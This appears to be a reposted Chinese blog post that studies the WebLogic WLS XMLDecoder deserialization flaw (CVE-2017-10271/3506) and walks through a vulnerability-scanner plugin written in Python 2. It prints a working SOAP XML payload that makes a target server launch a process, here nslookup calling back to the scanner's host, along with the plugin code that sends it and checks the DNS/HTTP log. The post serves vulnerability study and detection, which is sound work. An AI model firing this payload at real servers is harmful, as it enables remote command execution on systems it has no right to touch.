一、原理:
很明显啦,readobject又出来背锅了,一个XML的反序列化漏洞导致的命令执行。
具体原理我看不懂java代码的我也只能学习别人的分析。给出一篇参考文章,写的非常详细:
漏洞原理
二、如何构造命令执行的payload-xml:
1 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> ??2 ????<soapenv:Header> ?3 ????????<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> ??4 ????????????<java version="1.8" class="java.beans.XMLDecoder"> ?5 ????????????????<void class="java.lang.ProcessBuilder"> ?6 ????????????????????<array class="java.lang.String" length="3"> ?7 ????????????????????????<void index="0"> ?8 ????????????????????????????<string>nslookup</string> #命令名称 ?9 ????????????????????????</void> ?10 ????????????????????????<void index="1"> 11 ????????????????????????????<string>%s</string> #巡风的随机字符串,用来后面去查HTTP或者DNS log的flag字符串12 ????????????????????????</void> 13 ????????????????????????<void index="2"> 14 ????????????????????????????<string>%s</string> #目标IP15 ????????????????????????</void> 16 ????????????????????</array> ?17 ????????????????<void method="start"/>18 ????????????????</void> 19 ????????????</java> 20 ????????</work:WorkContext> 21 ????</soapenv:Header> ?22 ????<soapenv:Body/> 23 </soapenv:Envelope>
三、巡风的poc分析:
讲一下验证流程:
1、首先发包请求目标地址,如果目标地址返回存在banner信息:Web Services在报文中则进行下一步测试。 (首先得有weblogic啊)
2、发请求把XML内容 POST到目标主机去,休息2s后请求巡风的自己的WEB服务器上的http://%s:8088/{随机字符串} 相当于记录了NSLOOKUP的dnslog。如何查到了,返回结果有YES则存在漏洞,否则不存在。
?1 #!/usr/bin/python ?2 # coding:utf-8 ?3 ‘‘‘ ?4 巡风及巡风的插件基于python2 ?5 主要有两个函数: ?6 get_plugin_info() 返回插件信息 ?7 check(ip, port, timeout) 接收IP,端口号及超时参数供巡风主程序调用,有返回值且返回值在判断里为True,即为漏洞存在,返回值即为本次的扫描结果,详情请看接下来的函数实现 ?8 ‘‘‘ ?9 ?10 import random 11 import urllib2 12 import socket 13 from time import sleep 14 ?15 ?16 def get_plugin_info(): 17 ????‘‘‘get_plugin_info 函数用于返回该插件和插件所检测漏洞的信息‘‘‘ 18 ????plugin_info = { 19 ????????"name": "WebLogic WLS RCE CVE-2017-10271", 20 ????????"info": "Oracle WebLogic Server WLS安全组件中的缺陷导致远程命令执行", 21 ????????"level": "高危", 22 ????????"type": "命令执行", 23 ????????"author": ".@sinosig", 24 ????????"url": "https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html", 25 ????????"keyword": "tag:weblogic", 26 ????} 27 ????return plugin_info 28 ?29 ?30 def random_str(len): 31 ????‘‘‘返回随机字符串‘‘‘ 32 ????str1 = "" 33 ????for i in range(len): 34 ????????str1 += (random.choice("ABCDEFGH1234567890")) 35 ????return str(str1) 36 ?37 ?38 def get_ver_ip(ip): 39 ????‘‘‘返回当前服务器ip,当poc所用payload无回显时,可以使用巡风辅助验证的http服务和dns服务‘‘‘ 40 ????csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 41 ????csock.connect((ip, 80)) 42 ????(addr, port) = csock.getsockname() 43 ????csock.close() 44 ????return addr 45 ?46 ?47 def check(ip, port, timeout): 48 ????‘‘‘本次poc的验证的主函数,巡风会调用该函数进行漏洞检测‘‘‘ 49 ????test_str = random_str(6) 50 ????server_ip = get_ver_ip(ip) 51 ????check_url = [‘/wls-wsat/CoordinatorPortType‘, ‘/wls-wsat/CoordinatorPortType11‘] 52 ?53 ????heads = { 54 ????????‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)‘, 55 ????????‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8‘, 56 ????????‘Accept-Language‘: ‘zh-CN,zh;q=0.8‘, 57 ????????‘SOAPAction‘: "", 58 ????????‘Content-Type‘: ‘text/xml;charset=UTF-8‘, 59 ????} 60 ?61 ????# 本次漏洞的payload 62 ????# 本次命令执行漏洞的payload所触发的response没有明显回显和行为提供判断,所以作者使用nslookup发送dns请求到get_ver_ip函数中取到的服务器地址,如果巡风服务器收到带有random_str函数生成的随机字符串的dns请求即可判断为漏洞存在。 63 ????post_str = ‘‘‘ 64 ????????<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> ??65 ??????????<soapenv:Header> ?66 ????????????<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> ??67 ??????????????<java version="1.8" class="java.beans.XMLDecoder"> ?68 ????????????????<void class="java.lang.ProcessBuilder"> ?69 ??????????????????<array class="java.lang.String" length="3"> ?70 ????????????????????<void index="0"> ?71 ??????????????????????<string>nslookup</string> ?72 ????????????????????</void> ??73 ????????????????????<void index="1"> ?74 ??????????????????????<string>%s</string> ?75 ????????????????????</void> ?76 ????????????????????<void index="2"> ?77 ??????????????????????<string>%s</string> ?78 ????????????????????</void> ?79 ??????????????????</array> ??80 ??????????????????<void method="start"/> 81 ????????????????</void> ?82 ??????????????</java> ?83 ????????????</work:WorkContext> ?84 ??????????</soapenv:Header> ??85 ??????????<soapenv:Body/> ?86 ????????</soapenv:Envelope> 87 ????????????????‘‘‘ % (test_str, server_ip) 88 ????for url in check_url: 89 ????????target_url = ‘http://‘ + ip + ‘:‘ + str(port) + url.strip() 90 ????????req = urllib2.Request(url=target_url, headers=heads) 91 ????????if ‘Web Services‘ in urllib2.urlopen(req, timeout=timeout).read(): 92 ????????????req = urllib2.Request(url=target_url, data=post_str, headers=heads) 93 ????????????try: 94 ????????????????urllib2.urlopen(req, timeout=timeout).read() 95 ????????????except urllib2.URLError: 96 ????????????????pass 97 ????????????sleep(2) 98 ????????????# 这里请求 http://{巡风的地址}:8088/{本次生成随机字符串} 如果返回YES,则证明服务器收到该请求,漏洞存在 99 ????????????check_result = urllib2.urlopen("http://%s:8088/%s" % (server_ip, test_str), timeout=timeout).read()100 ????????????if "YES" in check_result:101 ????????????????return "Exist CVE-2017-10271"102 ????????else:103 ????????????passweblogic新漏洞学习cve-2017-3506
原文地址:https://www.cnblogs.com/KevinGeorge/p/8127154.html